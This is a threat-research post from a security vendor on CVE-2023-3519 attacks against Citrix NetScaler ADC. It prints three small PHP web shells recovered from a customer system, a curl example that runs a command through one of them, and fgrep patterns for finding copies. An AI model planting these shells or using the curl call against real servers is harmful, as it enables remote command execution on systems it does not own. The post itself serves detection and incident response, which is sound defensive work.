Research

CVE-2023-3519: Stairwell identifies previously unseen attack methods

On July 26th, the Stairwell team identified and conducted additional analysis for a customer regarding three PHP files found in their environment during their efforts to investigate the recent Citrix Netscaler ADC vulnerability (CVE-2023-3519). However, the observed shells and activity did not align with the information provided in the report by CISA.

After obtaining permission from the customer, we are sharing these redacted details to increase awareness of a separate set of activities linked to CVE-2023-3519. This sharing is being done while the customer carries out their remediation process. Stairwell would like to extend its gratitude to the Shadowserver Foundation for their collaborative efforts. They have also released information about the related activity, which can be found here: Technical Summary of Observed Citrix CVE-2023-3519 Incidents.

As a result of this new activity, the Stairwell team has released an optimized version of Stairwell that is available to customers and optimized to run on Citrix appliances such as ADC and Gateway. 

The following details outline the web shells that were automatically flagged as malicious by Stairwell’s Mal-Eval and analyzed by the Stairwell threat research team:

File: /var/netscaler/logon/LogonPoint/uiareas/mac/[redacted].php

<?php
http_response_code(404);

@$_POST['variable1']($_POST['variable2']);

?>

This web shell is triggered by an attacker passing the function name to execute in a parameter named variable1 and arguments in one named variable2. An attacker could leverage this web shell for command execution by passing eval(), as shown in the following example:

curl -x POST \
  $URL\
  -d “variable1=eval&variable2=whoami”

Additional functionality beyond remote command execution is possible using this web shell by passing additional PHP code through the variable2 parameter.

Similar to the previous request, this web shell is designed to allow an attacker direct remote command execution.  Commands for execution are base64 encoded and sent in an HTTP POST request parameter. There were two files containing identical PHP, with only the location, file name, and variable modified.

File: /var/netscaler/logon/LogonPoint/uiareas/linux/[redacted].php

<?php

http_response_code(404);

eval(base64_decode($_POST['variable']));

?>

The third web shell discovered was fundamentally the same code but saved in a different location with a different filename and a different variable.

File: /var/netscaler/logon/LogonPoint/uiareas/mac/[redacted].php

<?php

http_response_code(404);

eval(base64_decode($_POST['variable']));

?>

Check for compromise

Citrix administrators can use the following commands to identify potential copies of this web shell in their environment. These searches are very broad and could identify legitimate files; administrators should evaluate each finding:

fgrep -r 'eval(base64_decode($_POST' /var/netscaler/
fgrep -r 'http_response_code(' /var/netscaler/
Background pattern